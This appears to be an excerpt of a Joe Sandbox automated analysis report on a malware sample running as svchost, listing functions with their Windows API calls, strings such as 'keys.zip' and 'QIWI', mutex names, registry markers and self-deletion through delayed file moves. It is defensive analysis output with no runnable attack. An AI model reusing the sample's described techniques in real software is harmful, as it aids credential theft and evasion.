GetHandleInformation.KERNEL32(00000000,?), ref: 02D42F19
CloseHandle.KERNEL32(00000000), ref: 02D42F2B
PathAddBackslashA.SHLWAPI(5E8DC473), ref: 02D42F36
Sleep.KERNEL32(00009C40,5E8DC473,RFK), ref: 02D42F50
Sleep.KERNEL32(00000064), ref: 02D42F56

Strings

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D42EF0
RFK, xrefs: 02D42F3C
5E8DC473, xrefs: 02D42F31, 02D42F41

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
String ID: 5E8DC473$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$RFK
API String ID: 4280258085-3548839560
Opcode ID: c84c3b66865bed0a570e085ffc556879d378d498ece9dff0b820114a671668b1
Instruction ID: eeeac634d657d7eb72b6423f7d86f7857c9b2982d0ef9fcbc8103c63f39fbd29
Opcode Fuzzy Hash: c84c3b66865bed0a570e085ffc556879d378d498ece9dff0b820114a671668b1
Instruction Fuzzy Hash: 35F082319883116BF2216B61AC0DB1E37946F05B05F904514FD86A2381DBB49D598AB2

Function 02D2F950 Relevance: 15.3, APIs: 7, Strings: 3, Instructions: 271COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 02D2FA2A
memcpy.MSVCRT ref: 02D2FADA
_snprintf.MSVCRT ref: 02D2FAF6
memcpy.MSVCRT ref: 02D2FB05
memcpy.MSVCRT ref: 02D2FB5C
memcpy.MSVCRT ref: 02D2FB7D
memcpy.MSVCRT ref: 02D2FBFF

Strings

Content-Length, xrefs: 02D2FB43
%x, xrefs: 02D2FAEE
0, xrefs: 02D2FB0A

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: memcpy$_snprintf
String ID: 0$%x$Content-Length
API String ID: 4125937431-3838797520
Opcode ID: e9a6164b574e81eab560cf1b211402d584533978d6fee3124352570322dd306c
Instruction ID: 70a5f024987cd7a7b4ca0cbe84527a356535de874425bd6a4bdc0207a409b594
Opcode Fuzzy Hash: e9a6164b574e81eab560cf1b211402d584533978d6fee3124352570322dd306c
Instruction Fuzzy Hash: 7D9163B1604716AFC714DF68D89496AB3B9FF98318B048E29E95987B40D770EC18CBE1

Function 02D492D0 Relevance: 15.1, APIs: 10, Instructions: 97memoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00004070,?,00000000,75B0A250,?,02D338A8,?), ref: 02D492E3
HeapAlloc.KERNEL32(00000000,?,02D338A8,?), ref: 02D492E6
memset.MSVCRT ref: 02D492FB
CreateFileA.KERNEL32(02D338A8,40000000,00000003,00000000,00000002,00000080,00000000,?,02D338A8,?), ref: 02D49352
GetProcessHeap.KERNEL32(00000000,00000000,?,02D338A8,?), ref: 02D49375
HeapValidate.KERNEL32(00000000,?,02D338A8,?), ref: 02D49378
GetProcessHeap.KERNEL32(00000000,00000000,?,02D338A8,?), ref: 02D49384
HeapFree.KERNEL32(00000000,?,02D338A8,?), ref: 02D49387
GetProcessHeap.KERNEL32(00000008,00000010,?,02D338A8,?), ref: 02D4939A
HeapAlloc.KERNEL32(00000000,?,02D338A8,?), ref: 02D4939D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$CreateFileFreeValidatememset
String ID:
API String ID: 604365451-0
Opcode ID: fd598a42c1807dd904292db8b627625e445b85da0ef4aeb29cb7763402200c2b
Instruction ID: 25cc8b65e7aad3b1dff6cd470c04c448328f83bbd95289363e82f32f1c7336fc
Opcode Fuzzy Hash: fd598a42c1807dd904292db8b627625e445b85da0ef4aeb29cb7763402200c2b
Instruction Fuzzy Hash: 893170B19413019FD7309F66989CB57BBE8FB59718F44893EE2C987681C7709C80CBA0

Function 02D2B600 Relevance: 15.1, APIs: 10, Instructions: 81synchronizationwindowthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2B623
ReleaseMutex.KERNEL32(00000000), ref: 02D2B650
IsWindow.USER32(?), ref: 02D2B657
SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02D2B669
GetCurrentThreadId.KERNEL32 ref: 02D2B678
GetWindowThreadProcessId.USER32(?,00000000), ref: 02D2B682
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2B694
ReleaseMutex.KERNEL32(00000000), ref: 02D2B6C1
IsWindow.USER32(?), ref: 02D2B6C8
SendMessageA.USER32(?,00000215,00000000,?), ref: 02D2B6DB

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Window$MessageMutexObjectReleaseSendSingleThreadWait$CurrentProcess
String ID:
API String ID: 2596333622-0
Opcode ID: ab359186f5ea7d00d57ca9f3a0525d56bc9de245b8c251ae5310cb7d4af60b8a
Instruction ID: 01405dc7d724379157eebf39255dd9811b93ceab479466f2017eee594fc1e925
Opcode Fuzzy Hash: ab359186f5ea7d00d57ca9f3a0525d56bc9de245b8c251ae5310cb7d4af60b8a
Instruction Fuzzy Hash: 66217F31A802109FC7108F59F84CEEABBE8EB59B25B544976F505CB391C7B45CA1CBB0

Function 02D43EB8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 118synchronizationsleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(02D7D19C), ref: 02D43ED7
PathAddBackslashA.SHLWAPI(02D7D19C,?,?), ref: 02D43F69
CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},?,?), ref: 02D43FF5
Sleep.KERNEL32(000003E8), ref: 02D44006
ReleaseMutex.KERNEL32(00000000), ref: 02D4400D

Part of subcall function 02D45580: GetHandleInformation.KERNEL32(?,00000000), ref: 02D45594
Part of subcall function 02D45580: CloseHandle.KERNEL32(?), ref: 02D455A5

Strings

keys.zip, xrefs: 02D43F1B
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}, xrefs: 02D43FEC
path.txt, xrefs: 02D43FAD

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: BackslashHandleMutexPath$CloseCreateInformationReleaseSleep
String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys.zip$path.txt
API String ID: 3621236684-558722157
Opcode ID: 529bc0add5eb58a6fd5bd0b2c380fa1e3bbb5865caed323ab6de069d60a57639
Instruction ID: 8ca3afcab20d60731841f36eb7860715dff70eb2b34fbd9569d7977c8fb3390c
Opcode Fuzzy Hash: 529bc0add5eb58a6fd5bd0b2c380fa1e3bbb5865caed323ab6de069d60a57639
Instruction Fuzzy Hash: 2F41FC3194469A4FDB168B2CA4387EA7BF2AF4A300F2546D5D8C9D7341EF719D48CBA0

Function 02D341E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 114registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D34214
RegOpenKeyExA.ADVAPI32(00000104,software\microsoft,00000000,00000101,80000002,?,76EEC3F0,00000000), ref: 02D34237
RegQueryValueExA.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,?,76EEC3F0,00000000), ref: 02D3425A
GetProcessHeap.KERNEL32(00000008,00000015,?,76EEC3F0,00000000), ref: 02D342CD
HeapAlloc.KERNEL32(00000000,?,76EEC3F0,00000000), ref: 02D342D4
memset.MSVCRT ref: 02D342E4
RegCloseKey.ADVAPI32(80000002,?,76EEC3F0,00000000), ref: 02D34312

Strings

software\microsoft, xrefs: 02D34231

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heapmemset$AllocCloseOpenProcessQueryValue
String ID: software\microsoft
API String ID: 4043890984-3673152959
Opcode ID: e3e9b54d30dcf1980a7c64da2b3f59cba634dc48b326beb64c7c29b945d052d7
Instruction ID: 3603a98359ee13b13944c9a52d641273c268b875cbcca58f9818422a87f404ac
Opcode Fuzzy Hash: e3e9b54d30dcf1980a7c64da2b3f59cba634dc48b326beb64c7c29b945d052d7
Instruction Fuzzy Hash: 1C31E636D00219ABCB22CB65E858FDB7BB8FB85704F148194E995A7300D774DE49CBE0

Function 02D41AE0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,02D41990,00000000,00000000,00000000), ref: 02D41AF4
Sleep.KERNEL32(00009C40), ref: 02D41B05
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D41B0E
GetHandleInformation.KERNEL32(00000000,?), ref: 02D41B20
CloseHandle.KERNEL32(00000000), ref: 02D41B31
PathAddBackslashA.SHLWAPI(5E8DC3D7), ref: 02D41B3C

Strings

QIWI, xrefs: 02D41B42
5E8DC3D7, xrefs: 02D41B37, 02D41B47

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$BackslashCloseCreateInformationObjectPathSingleSleepThreadWait
String ID: 5E8DC3D7$QIWI
API String ID: 197911262-1061010709
Opcode ID: 29d046254908d307533eb73e8c51934b50338cc1cab034c2c0a152420141d505
Instruction ID: 5a918e0c8684f4a2ed53f6c0f93b9397780ae8d6adef116a0ecccd6bdaf274c8
Opcode Fuzzy Hash: 29d046254908d307533eb73e8c51934b50338cc1cab034c2c0a152420141d505
Instruction Fuzzy Hash: E4F0C231A85318BBF32057A4BD0EF6A37A89B06B55F200641F909A53C0EAE49D6487B5

Function 02D39BE0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D39BE7
GetTickCount.KERNEL32 ref: 02D39BF9
RegOpenKeyExA.ADVAPI32(-80000001,software\microsoft,00000000,00000102,02D39E3F,?,02D39E3F), ref: 02D39C13
RegSetValueExA.ADVAPI32(02D39E3F,a1633fdda,00000000,00000004,00000004,00000004,02D39E3F), ref: 02D39C30
RegFlushKey.ADVAPI32(?), ref: 02D39C3A
RegCloseKey.ADVAPI32(?), ref: 02D39C44

Strings

a1633fdda, xrefs: 02D39C2A
software\microsoft, xrefs: 02D39C0D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: AdminCloseCountFlushOpenTickUserValue
String ID: a1633fdda$software\microsoft
API String ID: 287100044-4110729799
Opcode ID: 5558c19d5e5d89a4bffb876685e80476fde2c0934e3a36f97ee2fcf1d8294308
Instruction ID: af5e85812bee44f124eda190068077a9d4127b2be0c7a5dc3a2d94abe5046bbc
Opcode Fuzzy Hash: 5558c19d5e5d89a4bffb876685e80476fde2c0934e3a36f97ee2fcf1d8294308
Instruction Fuzzy Hash: 78F03175D80218FBE710DBA0EC5DF9E7778AB08701F504554FA02A2340D6749E548AF1

Function 02D333A0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D333A7
GetTickCount.KERNEL32 ref: 02D333B9
RegOpenKeyExA.ADVAPI32(-80000001,software\microsoft,00000000,00000102,02D3581A,?,02D3581A), ref: 02D333D3
RegSetValueExA.ADVAPI32(02D3581A,A1633F95a,00000000,00000004,00000004,00000004,02D3581A), ref: 02D333F0
RegFlushKey.ADVAPI32(?), ref: 02D333FA
RegCloseKey.ADVAPI32(?), ref: 02D33404

Strings

A1633F95a, xrefs: 02D333EA
software\microsoft, xrefs: 02D333CD

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: AdminCloseCountFlushOpenTickUserValue
String ID: A1633F95a$software\microsoft
API String ID: 287100044-1894910394
Opcode ID: c6a2ab5d8d29f4e943d9d9fd9d3a150484ef343f78937ab2258337b61aca3bad
Instruction ID: e627a367c4b1eddb4bc09dc475371c44aa56d279cb4fc9b3f3dca43a57332034
Opcode Fuzzy Hash: c6a2ab5d8d29f4e943d9d9fd9d3a150484ef343f78937ab2258337b61aca3bad
Instruction Fuzzy Hash: 78F03175D80218FBD710DBA0EC4DF9D7738AB08701F504554FA02A2340D6749E5586F5

Function 02D236E0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D236E7
GetTickCount.KERNEL32 ref: 02D236F9
RegOpenKeyExA.ADVAPI32(-80000001,software\microsoft,00000000,00000102,?), ref: 02D23713
RegSetValueExA.ADVAPI32(?,a1633e4fa,00000000,00000004,?,00000004), ref: 02D23730
RegFlushKey.ADVAPI32(?), ref: 02D2373A
RegCloseKey.ADVAPI32(?), ref: 02D23744

Strings

a1633e4fa, xrefs: 02D2372A
software\microsoft, xrefs: 02D2370D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: AdminCloseCountFlushOpenTickUserValue
String ID: a1633e4fa$software\microsoft
API String ID: 287100044-77370241
Opcode ID: e6f20699daf392ebe734f4e79332b439a8aea850127d753c5e4f88603c7c5285
Instruction ID: 0e11d00cb17104a248a07a1bdf4db6cc89c3688f6658b00cb55ec5b168bd26e8
Opcode Fuzzy Hash: e6f20699daf392ebe734f4e79332b439a8aea850127d753c5e4f88603c7c5285
Instruction Fuzzy Hash: AAF03175D80218FBD710DBA0EC5DF9D7738AB08705F504554FA02A2340D6749E5596F1

Function 02D22AE0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 02D22AF7
exit.MSVCRT ref: 02D22B05
calloc.MSVCRT ref: 02D22B0E
exit.MSVCRT ref: 02D22B1C
calloc.MSVCRT ref: 02D22B25
exit.MSVCRT ref: 02D22B32
free.MSVCRT(?), ref: 02D22C81
free.MSVCRT(?), ref: 02D22CA9
free.MSVCRT(00000000), ref: 02D22CC5

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: callocexitfree
String ID:
API String ID: 3367576030-0
Opcode ID: 1d165b4dbc48dbcf790d2c1551a5a8fcf413b95a8f75c7bd49eb5cf08c946d06
Instruction ID: f1abcfd33a96292e104a852a0ba8f424fd9c990833c5286cb991b36a1df095a2
Opcode Fuzzy Hash: 1d165b4dbc48dbcf790d2c1551a5a8fcf413b95a8f75c7bd49eb5cf08c946d06
Instruction Fuzzy Hash: 84617D75A00629AFDB10CF68C884BAE77A4FFA8318F104418FD459B348D771EE55CBA1

Function 02D4D9B0 Relevance: 13.7, APIs: 9, Instructions: 191fileCOMMON

Download Yara Rule

APIs

select.WS2_32(?,00000000,?,00000000,?), ref: 02D4DA31
malloc.MSVCRT ref: 02D4DA4A
malloc.MSVCRT ref: 02D4DA5A
free.MSVCRT(00000000), ref: 02D4DA69
ReadFile.KERNEL32(?,00000000,00002000,?,00000000), ref: 02D4DA95
CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02D4DB77
free.MSVCRT ref: 02D4DB96
free.MSVCRT(?,?,00000000,00000000,00000000,?), ref: 02D4DBB3
free.MSVCRT(00000000), ref: 02D4DBB9

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: free$malloc$CloseFileHandleReadselect
String ID:
API String ID: 158848325-0
Opcode ID: ca7acc68a3011e1633e6ab55307fe3f6c2a34525efa12d8472624b60f3c2c765
Instruction ID: d322d107405fe22c6c8172ec97d6175c5de949dde6411eb40dbf15d6748b1da2
Opcode Fuzzy Hash: ca7acc68a3011e1633e6ab55307fe3f6c2a34525efa12d8472624b60f3c2c765
Instruction Fuzzy Hash: 8951C471A046049FDB10DFA89C84BFFB7FAEB45724F10056AE559D7380DA70AD41CBA0

Function 02D2C100 Relevance: 13.6, APIs: 9, Instructions: 120synchronizationCOMMON

Download Yara Rule

APIs

WindowFromDC.USER32(?), ref: 02D2C10C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D2C144
CreateRectRgn.GDI32(00000001,00000001,00000001,00000001), ref: 02D2C152
GetClipRgn.GDI32(?,00000000), ref: 02D2C15C
SelectClipRgn.GDI32(00000000,00000000), ref: 02D2C16C
DeleteObject.GDI32(00000000), ref: 02D2C173
GetViewportOrgEx.GDI32(?,?), ref: 02D2C17E
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 02D2C192
ReleaseMutex.KERNEL32(00000000), ref: 02D2C1D3

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
String ID:
API String ID: 3315380975-0
Opcode ID: 12d02ae00dbcbf1092d43373831f24409f53bc222dbc80f033b45393813f64d3
Instruction ID: f81045c7d60ec62a1b3365bbd313dd552bcef353b759c697d9bf3cefdd5fa71f
Opcode Fuzzy Hash: 12d02ae00dbcbf1092d43373831f24409f53bc222dbc80f033b45393813f64d3
Instruction Fuzzy Hash: AA411776610205AFCB14CF98EC88EAB77B9EB8C715B108A09FA09C3340D634EC51CBA0

Function 00401520 Relevance: 13.6, APIs: 9, Instructions: 66fileCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(00401F70,?,0000001C), ref: 0040154F
GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00401565
PathFileExistsA.SHLWAPI(?), ref: 00401572
GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401589
GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 004015A1
MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004015BD
SetFileAttributesA.KERNEL32(?,00000000), ref: 004015CC
DeleteFileA.KERNEL32(?), ref: 004015D9
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004015ED

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
String ID:
API String ID: 2787354276-0
Opcode ID: 3973d0feee2bd4d46e794484f13dae327776c0d4aca43c2d9e078c91308a651e
Instruction ID: 1f2af84f05926cbb5e0b354959f29bdceae47d8b45da359f5ec46e55e0df53d3
Opcode Fuzzy Hash: 3973d0feee2bd4d46e794484f13dae327776c0d4aca43c2d9e078c91308a651e
Instruction Fuzzy Hash: 3F21FCB1D00219AFDB10DBA0DD49FEA77BCAB48700F0045AAA709F6190EB749B448FA5

Function 02D4A010 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 226timeCOMMON

Download Yara Rule

APIs

Part of subcall function 02D503B0: select.WS2_32(?,?,00000000,00000000,?), ref: 02D50437
Part of subcall function 02D503B0: __WSAFDIsSet.WS2_32(?,?), ref: 02D50468
Part of subcall function 02D503B0: recv.WS2_32(?,?,00000005,00000000), ref: 02D5048B
Part of subcall function 02D503B0: recv.WS2_32(?,?,00000004,00000000), ref: 02D504AD
Part of subcall function 02D503B0: socket.WS2_32(00000002,00000001,00000000), ref: 02D504C6
Part of subcall function 02D503B0: setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 02D504E2

malloc.MSVCRT ref: 02D4A033
GetSystemTime.KERNEL32(?), ref: 02D4A107
GetSystemTime.KERNEL32(?), ref: 02D4A152
GetSystemTime.KERNEL32(00000000,?), ref: 02D4A1E4
GetSystemTime.KERNEL32(SYSTEM!528110!3DEABDE9,?), ref: 02D4A232
free.MSVCRT(00000000), ref: 02D4A2EF

Strings

SYSTEM!528110!3DEABDE9, xrefs: 02D4A231

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: SystemTime$recv$freemallocselectsetsockoptsocket
String ID: SYSTEM!528110!3DEABDE9
API String ID: 2153857484-4108202809
Opcode ID: afb650192e174b49911ac4f1257e99f7a50360cadf3613ad937c32d6c83c7364
Instruction ID: c00129eda87952c9242a6b971c25e770ad36fb0c8b65a60f7bc69205326791c7
Opcode Fuzzy Hash: afb650192e174b49911ac4f1257e99f7a50360cadf3613ad937c32d6c83c7364
Instruction Fuzzy Hash: D191B231A406458FDB28CF28C1A87BEBBF5EF44304F14466DE4969B784DB35B981CB60

Function 02D3AAC0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 98libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D3AAD7
GetVersionExW.KERNEL32(?), ref: 02D3AAFA
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D3ABCB
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02D3ABDC
GetCurrentProcess.KERNEL32(00000000), ref: 02D3ABEC

Strings

kernel32.dll, xrefs: 02D3ABB9
IsWow64Process, xrefs: 02D3ABD6

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcessVersionmemset
String ID: IsWow64Process$kernel32.dll
API String ID: 877405840-3024904723
Opcode ID: 207314704e22131e373bdc1270cada7d3fe05d2476992119e7c6c3be6e67e1c5
Instruction ID: d005d8d5e3c7210f550b3f078d3ff16ed8125a61c1a6dfc1e430372a3e4b0f0d
Opcode Fuzzy Hash: 207314704e22131e373bdc1270cada7d3fe05d2476992119e7c6c3be6e67e1c5
Instruction Fuzzy Hash: FF317C70B00259CBDF7ACF54D899BF973B6AF01304F5401ADD6869A380EB759E94CB90

Function 02D35600 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 51registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D35628
RegQueryValueExA.ADVAPI32(02D3676C,a16338a8a,00000000,?,00000000,?), ref: 02D3566A
RegCloseKey.ADVAPI32(02D3676C), ref: 02D35674
RegOpenKeyExA.ADVAPI32(-80000001), ref: 02D3563A

Part of subcall function 02D23600: IsUserAnAdmin.SHELL32 ref: 02D23608
Part of subcall function 02D23600: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02D35686), ref: 02D2363F
Part of subcall function 02D23600: RegQueryValueExA.ADVAPI32(02D35686,a1633e4fa,00000000,?,00000000,?), ref: 02D2365C
Part of subcall function 02D23600: RegCloseKey.ADVAPI32(02D35686), ref: 02D23666
Part of subcall function 02D23600: RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 02D23699
Part of subcall function 02D23600: RegQueryValueExA.ADVAPI32(?,a1633e4fa,00000000,?,00000000,?), ref: 02D236B6
Part of subcall function 02D23600: RegCloseKey.ADVAPI32(?), ref: 02D236C0

Strings

a16338a8a, xrefs: 02D3564B
software\microsoft, xrefs: 02D3561C
A1633711a, xrefs: 02D35652, 02D35668

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue$AdminUser
String ID: A1633711a$a16338a8a$software\microsoft
API String ID: 2113243795-4201954786
Opcode ID: feea12197fbc0493c78e620da57b6f0b85a13bbbcf9644abdb0be2894c0afcaa
Instruction ID: ed5723a2c30ea60241b0ac4094d949524c47f1ba31d11cc39882910975c39bd9
Opcode Fuzzy Hash: feea12197fbc0493c78e620da57b6f0b85a13bbbcf9644abdb0be2894c0afcaa
Instruction Fuzzy Hash: E5014075E90209ABDB00DBB4EC4ABAEB7B8EB08705F504658F515D6380E678DD448BA0

Function 02D3A040 Relevance: 12.1, APIs: 8, Instructions: 139memoryCOMMON

